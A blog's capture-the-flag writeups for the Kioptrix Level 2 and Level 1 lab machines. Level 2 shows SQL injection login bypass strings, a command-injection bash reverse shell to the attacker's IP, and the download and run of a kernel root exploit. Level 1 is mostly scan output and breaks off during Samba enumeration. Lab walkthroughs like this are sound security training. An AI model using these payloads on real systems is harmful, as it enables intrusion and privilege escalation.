崔芷菘's web log. Senior System Operations Engineer, committed to growing into an excellent ethical hacker. Official translator of Zabbix 6.0.

Kioptrix Level 2 Writeup

Objective

Get root access via any means.

Enumeration

Find the target ip:

└─$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ad:36:56, IPv4: 10.10.10.129
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.10.10.1      00:50:56:c0:00:08       VMware, Inc.
10.10.10.2      00:50:56:ed:49:99       VMware, Inc.
10.10.10.133    00:0c:29:50:1f:1f       VMware, Inc.
10.10.10.254    00:50:56:e5:1b:02       VMware, Inc.

The target ip is 10.10.10.133.

Detect ports, services and some known vulnerabilities:

# Nmap 7.91 scan initiated Fri Nov  4 06:58:51 2022 as: nmap -A -p 1-1100 -oN nmap_result.txt 10.10.10.133
Nmap scan report for 10.10.10.133
Host is up (0.0020s latency).
Not shown: 1094 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp  open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            752/udp   status
|_  100024  1            755/tcp   status
443/tcp open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2022-11-04T06:35:42+00:00; -4h23m24s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
631/tcp open  ipp      CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-title: 403 Forbidden
755/tcp open  status   1 (RPC #100024)

Host script results:
|_clock-skew: -4h23m24s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov  4 06:59:06 2022 -- 1 IP address (1 host up) scanned in 14.75 seconds

Since port 80 is open, next I will try opening its web pages.

Exploitation

There's a login form, so the first thing that came to my mind is SQL injection.

I tried several SQL injection strings as a quick test, entering each of the following as both the username and the password:

admin'

admin'--

admin' or '1' = '1

And luckily the last one worked! I logged in successfully:
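To show why only the third string logs in, here is an added example that is not part of the original writeup or of the Kioptrix VM: a login function that splices the submitted values into the SQL text next to a parameterized one, both run against a constructed in-memory SQLite table. The lab's real query, table and credentials are not on the page, so the shape of the query and the sample row are assumptions.

```python
import sqlite3

# The three strings tried in the writeup, each submitted as both fields.
PAYLOADS = ["admin'", "admin'--", "admin' or '1' = '1"]

def make_db():
    # Constructed stand-in for the lab's user table (the real table and
    # credentials are not on the page; the row below is made up).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('john', 'tr3asure-hunt')")
    return conn

def vulnerable_login(conn, username, password):
    # Assumed shape of the weak query: input is spliced into the SQL text,
    # so quotes and comment markers in it change the statement's grammar.
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    return conn.execute(query).fetchone() is not None

def safe_login(conn, username, password):
    # Parameterized query: the driver binds the values as data, so the same
    # strings are compared literally and never parsed as SQL.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row is not None

def probe(conn, login, payload):
    """Submit payload as both username and password, as in the writeup,
    and classify what the application would observe."""
    try:
        return "bypassed" if login(conn, payload, payload) else "rejected"
    except sqlite3.OperationalError:
        # An unbalanced quote breaks the statement; a real app would show
        # a database error page here, which is itself a tell.
        return "sql-error"

def compare():
    """Map each payload to (vulnerable result, parameterized result)."""
    conn = make_db()
    return {p: (probe(conn, vulnerable_login, p), probe(conn, safe_login, p))
            for p in PAYLOADS}

if __name__ == "__main__":
    for payload, (weak, safe) in compare().items():
        print("%-22s vulnerable=%-9s parameterized=%s" % (payload, weak, safe))
```

Against the concatenated query, admin' produces a syntax error, admin'-- turns the statement into a lookup of a user literally named admin (rejected here only because the constructed table has no such user; with an admin row it would log in without a password) and the tautology matches every row. The parameterized version rejects all three because the bound values are compared as plain strings.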

Now there’s another web page:

It tells me I can run ping tests. Pages like this often have command injection vulnerabilities. To verify my hypothesis, I appended an ls command after the ping target:

which worked: the directory contents are listed after the ping output. Next I tried to inject a bash reverse shell instead of the ls command. But before that, I need to start a listener:

Now it's time to inject the bash reverse shell:

The full command is below:

127.0.0.1 & bash -i >& /dev/tcp/10.10.10.129/4444 0>&1

OK, I’m in.
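The server-side fix is to stop handing user input to a shell at all. The following is an added example, not code from the writeup or from the Kioptrix VM: it tokenizes the concatenated command line the way a POSIX shell would, so the & shows up as the boundary between two commands, and then shows a hardened alternative that canonicalizes the host with ipaddress and builds an argv list for subprocess without a shell. The ping page's real implementation is not on the page, so build_command_unsafe is an assumption about its shape.

```python
import ipaddress
import shlex

# Assumption: the lab's ping page concatenates the submitted host into a
# shell command line like this. The string is only built here, never run.
def build_command_unsafe(host):
    return "ping -c 3 " + host

# Shell control operators that end one simple command and start another.
CONTROL_OPERATORS = {"&", "&&", ";", "|", "||"}

def split_commands(cmdline):
    """Tokenize cmdline as a POSIX shell would and split it into the simple
    commands the shell would run, one argv list per command."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in CONTROL_OPERATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands

def safe_ping_argv(host):
    """Return an argv list for subprocess.run(argv) with no shell involved.
    Anything that is not a syntactically valid IP address is rejected, and
    the canonical str(addr) form is used so no raw input reaches the
    command line."""
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError:
        raise ValueError("rejected ping target: %r" % host)
    return ["ping", "-c", "3", str(addr)]

def looks_like_injection(host):
    """Cheap signal for request logging and alerting: a field that should
    only ever hold an IP address contains shell metacharacters."""
    return any(ch in host for ch in ";&|`$()<>\n")

if __name__ == "__main__":
    for submitted in ["127.0.0.1", "127.0.0.1 & ls"]:
        print(submitted, "->", split_commands(build_command_unsafe(submitted)))
        try:
            print("  argv:", safe_ping_argv(submitted))
        except ValueError as exc:
            print("  ", exc)
```

With the shell out of the picture, the whole submitted string can only ever be one argument to ping, and because the validator rebuilds the address from the parsed object rather than echoing the input, even a host that passes validation cannot carry extra characters through.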

But I'm the user apache, not root, so I need to escalate privileges. I'll look for kernel vulnerabilities first. Got its kernel version and architecture:

Searching for vulnerabilities via searchsploit:

┌──(kali㉿kali)-[~/kioptrix_lv2]
└─$ searchsploit Linux Kernel escalation

From the search results, I'm going to use the entry 9574.txt:

┌──(kali㉿kali)-[~/kioptrix_lv2]
└─$ searchsploit -m linux/local/9574.txt                                                     1 ⨯
  Exploit: Linux Kernel < 2.6.19 (x86/x64) - 'udp_sendmsg' Local Privilege Escalation (2)
      URL: https://www.exploit-db.com/exploits/9574
     Path: /usr/share/exploitdb/exploits/linux/local/9574.txt
File Type: ASCII text, with CRLF line terminators

Copied to: /home/kali/kioptrix_lv2/9574.txt

The txt file points me to another file, which I think may be the real exploit archive:

After downloading the compressed file, I start an HTTP server on the Kali machine to share it:

┌──(kali㉿kali)-[~/kioptrix_lv2]
└─$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

On the victim VM, download the file and decompress it:

bash-3.00$ wget http://10.10.10.129:8000/9574.tgz
--05:26:16--  http://10.10.10.129:8000/9574.tgz
           => `9574.tgz'
Connecting to 10.10.10.129:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,359 (4.3K) [application/x-gtar-compressed]

    0K ....                                                  100%  415.71 MB/s

05:26:16 (415.71 MB/s) - `9574.tgz' saved [4359/4359]
bash-3.00$ tar zxvf 9574.tgz
therebel/
therebel/exploit.c
therebel/pwnkernel.c
therebel/therebel.sh

That creates a subdirectory named therebel. Switch into it and run therebel.sh:

bash-3.00$ cd therebel  
bash-3.00$ ls -l
total 20
-rw-r--r--  1 apache apache 9922 Sep  2  2009 exploit.c
-rw-r--r--  1 apache apache  782 Sep  2  2009 pwnkernel.c
-rwxr--r--  1 apache apache 1471 Sep  2  2009 therebel.sh
bash-3.00$ ./therebel.sh
sh: no job control in this shell
sh-3.00# whoami
root
sh-3.00# 

Alright, well done!

Kioptrix Level 1 Writeup

Objective

Get root access via any means.

Enumeration

Find the target ip:

└─$ sudo arp-scan -l                                                           
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ad:36:56, IPv4: 10.10.10.129
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.10.10.1      00:50:56:c0:00:08       VMware, Inc.
10.10.10.2      00:50:56:ed:49:99       VMware, Inc.
10.10.10.131    00:0c:29:61:73:cd       VMware, Inc.
10.10.10.254    00:50:56:e5:1b:02       VMware, Inc.

The target ip is 10.10.10.131.

Detect ports, services and some known vulnerabilities:

# Nmap 7.91 scan initiated Tue Nov  1 22:51:26 2022 as: nmap -sV -p1-1023 --script vuln -oN nmap_result.txt 10.10.10.131
Nmap scan report for 10.10.10.131
Host is up (0.0025s latency).
Not shown: 1018 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| vulners: 
|   cpe:/a:openbsd:openssh:2.9p2: 
|         CVE-2002-0640    10.0    https://vulners.com/cve/CVE-2002-0640
|         CVE-2002-0639    10.0    https://vulners.com/cve/CVE-2002-0639
|         CVE-2002-0083    10.0    https://vulners.com/cve/CVE-2002-0083
|         CVE-2011-2895    9.3    https://vulners.com/cve/CVE-2011-2895
|         CVE-2006-5051    9.3    https://vulners.com/cve/CVE-2006-5051
|         CVE-2006-4924    7.8    https://vulners.com/cve/CVE-2006-4924
|         CVE-2003-1562    7.6    https://vulners.com/cve/CVE-2003-1562
|         CVE-2010-4478    7.5    https://vulners.com/cve/CVE-2010-4478
|         CVE-2002-0575    7.5    https://vulners.com/cve/CVE-2002-0575
|         CVE-2001-1459    7.5    https://vulners.com/cve/CVE-2001-1459
|         CVE-2001-1380    7.5    https://vulners.com/cve/CVE-2001-1380
|         CVE-2001-0816    7.5    https://vulners.com/cve/CVE-2001-0816
|         SECURITYVULNS:VULN:1956    7.2    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1956
|         CVE-2001-0529    7.2    https://vulners.com/cve/CVE-2001-0529
|         SSV:64479    5.0    https://vulners.com/seebug/SSV:64479    *EXPLOIT*
|         SSV:6192    5.0    https://vulners.com/seebug/SSV:6192    *EXPLOIT*
|         SSV:60656    5.0    https://vulners.com/seebug/SSV:60656    *EXPLOIT*
|         SSV:16847    5.0    https://vulners.com/seebug/SSV:16847    *EXPLOIT*
|         PACKETSTORM:73600    5.0    https://vulners.com/packetstorm/PACKETSTORM:73600    *EXPLOIT*
|         PACKETSTORM:54435    5.0    https://vulners.com/packetstorm/PACKETSTORM:54435    *EXPLOIT*
|         EXPLOITPACK:63CFD85A8DA29BF22328E65C685CBBA3    5.0    https://vulners.com/exploitpack/EXPLOITPACK:63CFD85A8DA29BF22328E65C685CBBA3    *EXPLOIT*
|         EDB-ID:3303    5.0    https://vulners.com/exploitdb/EDB-ID:3303    *EXPLOIT*
|         CVE-2010-5107    5.0    https://vulners.com/cve/CVE-2010-5107
|         CVE-2007-2243    5.0    https://vulners.com/cve/CVE-2007-2243
|         CVE-2006-5052    5.0    https://vulners.com/cve/CVE-2006-5052
|         SSV:66339    4.9    https://vulners.com/seebug/SSV:66339    *EXPLOIT*
|         SSV:10777    4.9    https://vulners.com/seebug/SSV:10777    *EXPLOIT*
|         EXPLOITPACK:B5E7D30E7583980F37EF6DBC0B05FBC3    4.9    https://vulners.com/exploitpack/EXPLOITPACK:B5E7D30E7583980F37EF6DBC0B05FBC3    *EXPLOIT*
|         EDB-ID:8163    4.9    https://vulners.com/exploitdb/EDB-ID:8163    *EXPLOIT*
|         CVE-2009-0537    4.9    https://vulners.com/cve/CVE-2009-0537
|         CVE-2012-0814    3.5    https://vulners.com/cve/CVE-2012-0814
|         CVE-2011-4327    2.1    https://vulners.com/cve/CVE-2011-4327
|         CVE-2008-3259    1.2    https://vulners.com/cve/CVE-2008-3259
|         SECURITYVULNS:VULN:1953    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1953
|         SECURITYVULNS:VULN:1608    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1608
|         SECURITYVULNS:VULN:1499    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1499
|         SECURITYVULNS:VULN:1488    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1488
|         SECURITYVULNS:VULN:1474    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1474
|         SECURITYVULNS:VULN:1439    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1439
|         SECURITYVULNS:VULN:1344    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1344
|         SECURITYVULNS:VULN:1262    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1262
|_        SECURITYVULNS:VULN:1233    0.0    https://vulners.com/securityvulns/SECURITYVULNS:VULN:1233
80/tcp  open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /test.php: Test page
|   /icons/: Potentially interesting directory w/ listing on 'apache/1.3.20'
|   /manual/: Potentially interesting directory w/ listing on 'apache/1.3.20'
|_  /usage/: Potentially interesting folder
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
111/tcp open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp open  netbios-ssn Samba smbd (workgroup: EfKMYGROUP)
443/tcp open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.cvedetails.com/cve/2014-0224
|_      http://www.openssl.org/news/secadv_20140605.txt
| ssl-dh-params: 
|   VULNERABLE:
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  BID:74733  CVE:CVE-2015-4000
|       The Transport Layer Security (TLS) protocol contains a flaw that is
|       triggered when handling Diffie-Hellman key exchanges defined with
|       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
|       to downgrade the security of a TLS session to 512-bit export-grade
|       cryptography, which is significantly weaker, allowing the attacker
|       to more easily break the encryption and monitor or tamper with
|       the encrypted stream.
|     Disclosure date: 2015-5-19
|     Check results:
|       EXPORT-GRADE DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://www.securityfocus.com/bid/74733
|       https://weakdh.org
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|   
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|_      https://www.openssl.org/~bodo/ssl-poodle.pdf
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov  1 22:56:51 2022 -- 1 IP address (1 host up) scanned in 324.87 seconds

Try opening web pages:

Just a static web page, nothing more.

Use nikto to detect outdated software, directories, and some known vulnerabilities:

└─$ nikto -host 10.10.10.131 -output nikto_result.txt
- Nikto v2.1.6/2.1.5
+ Target Host: 10.10.10.131
+ Target Port: 80
+ GET Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep  5 23:12:46 2001
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-27487: GET Apache is vulnerable to XSS via the Expect header
+ HEAD mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ HEAD OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ HEAD Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: GET Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: GET Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: GET Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ GET mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ GET ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: GET /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: GET /manual/: Directory indexing found.
+ OSVDB-3092: GET /manual/: Web server manual found.
+ OSVDB-3268: GET /icons/: Directory indexing found.
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ OSVDB-3092: GET /test.php: This might be interesting...
+ GET /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ GET /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ GET /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ GET /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ GET /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ GET /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ GET /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ GET /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ GET /shell?cat+/etc/hosts: A backdoor was identified.

This might get you a remote shell:

I forgot OS detection. Run it again:

sudo nmap -O 10.10.10.131
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-01 23:59 EDT
Nmap scan report for 10.10.10.131
Host is up (0.00088s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm
MAC Address: 00:0C:29:61:73:CD (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Since Samba is running, we can enumerate it with enum4linux.

$ enum4linux 10.10.10.131 > enum4linux_result.txt

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Nov  1 23:44:32 2022

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.131
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.131    |
 ==================================================== 
[+] Got domain/workgroup name: MYGROUP

 ============================================ 
|    Nbtstat Information for 10.10.10.131    |
 ============================================ 
Looking up status of 10.10.10.131
    KIOPTRIX        <00> -         B <ACTIVE>  Workstation Service
    KIOPTRIX        <03> -         B <ACTIVE>  Messenger Service
    KIOPTRIX        <20> -         B <ACTIVE>  File Server Service
    ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
    MYGROUP         <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
    MYGROUP         <1d> -         B <ACTIVE>  Master Browser
    MYGROUP         <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

    MAC Address = 00-00-00-00-00-00

 ===================================== 
|    Session Check on 10.10.10.131    |
 ===================================== 
[+] Server 10.10.10.131 allows sessions using username '', password ''

 =========================================== 
|    Getting domain SID for 10.10.10.131    |
 =========================================== 
Domain Name: MYGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ====================================== 
|    OS information on 10.10.10.131    |
 ====================================== 
[+] Got OS info for 10.10.10.131 from smbclient: 
[+] Got OS info for 10.10.10.131 from srvinfo:
    KIOPTRIX       Wk Sv PrQ Unx NT SNT Samba Server
    platform_id     :    500
    os version      :    4.5
    server type     :    0x9a03

 ============================= 
|    Users on 10.10.10.131    |
 ============================= 


 ========================================= 
|    Share Enumeration on 10.10.10.131    |
 ========================================= 

    Sharename       Type      Comment
    ---------       ----      -------
    IPC$            IPC       IPC Service (Samba Server)
    ADMIN$          IPC       IPC Service (Samba Server)
Reconnecting with SMB1 for workgroup listing.

    Server               Comment
    ---------            -------
    KIOPTRIX             Samba Server

    Workgroup            Master
    ---------            -------
    MYGROUP              KIOPTRIX

[+] Attempting to map shares on 10.10.10.131
//10.10.10.131/IPC$    [E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//10.10.10.131/ADMIN$    [E] Can't understand response:
tree connect failed: NT_STATUS_WRONG_PASSWORD

 ==================================================== 
|    Password Policy Information for 10.10.10.131    |
 ==================================================== 
[E] Unexpected error from polenum:


[+] Attaching to 10.10.10.131 using a NULL share

[+] Trying protocol 139/SMB...

    [!] Protocol failed: SMB SessionError: 0x5

[+] Trying protocol 445/SMB...

    [!] Protocol failed: [Errno Connection error (10.10.10.131:445)] [Errno 111] Connection refused


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


 ============================== 
|    Groups on 10.10.10.131    |
 ============================== 

[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Power Users] rid:[0x223]
group:[Account Operators] rid:[0x224]
group:[System Operators] rid:[0x225]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]

[+] Getting builtin group memberships:
Group 'Power Users' (RID: 547) has member: Couldn't find group Power Users
Group 'Backup Operators' (RID: 551) has member: Couldn't find group Backup Operators
Group 'Guests' (RID: 546) has member: Couldn't find group Guests
Group 'Print Operators' (RID: 550) has member: Couldn't find group Print Operators
Group 'Account Operators' (RID: 548) has member: Couldn't find group Account Operators
Group 'System Operators' (RID: 549) has member: Couldn't find group System Operators
Group 'Administrators' (RID: 544) has member: Couldn't find group Administrators
Group 'Users' (RID: 545) has member: Couldn't find group Users
Group 'Replicator' (RID: 552) has member: Couldn't find group Replicator

[+] Getting local groups:
group:[sys] rid:[0x3ef]
group:[tty] rid:[0x3f3]
group:[disk] rid:[0x3f5]
group:[mem] rid:[0x3f9]
group:[kmem] rid:[0x3fb]
group:[wheel] rid:[0x3fd]
group:[man] rid:[0x407]
group:[dip] rid:[0x439]
group:[lock] rid:[0x455]
group:[users] rid:[0x4b1]
group:[slocate] rid:[0x413]
group:[floppy] rid:[0x40f]
group:[utmp] rid:[0x415]

[+] Getting local group memberships:

[+] Getting domain groups:
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]

[+] Getting domain group memberships:
Group 'Domain Users' (RID: 513) has member: Couldn't find group Domain Users
Group 'Domain Admins' (RID: 512) has member: Couldn't find group Domain Admins

 ======================================================================= 
|    Users on 10.10.10.131 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[I] Found new SID: S-1-5-21-4157223341-3243572438-1405127623
[+] Enumerating users using SID S-1-5-21-4157223341-3243572438-1405127623 and logon username '', password ''
S-1-5-21-4157223341-3243572438-1405127623-500 KIOPTRIX\ (0)
S-1-5-21-4157223341-3243572438-1405127623-501 KIOPTRIX\ (0)
S-1-5-21-4157223341-3243572438-1405127623-502 KIOPTRIX\unix_group.2147483399 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-503 KIOPTRIX\unix_group.2147483399 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-504 KIOPTRIX\unix_group.2147483400 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-505 KIOPTRIX\unix_group.2147483400 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-506 KIOPTRIX\unix_group.2147483401 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-507 KIOPTRIX\unix_group.2147483401 (Local Group)
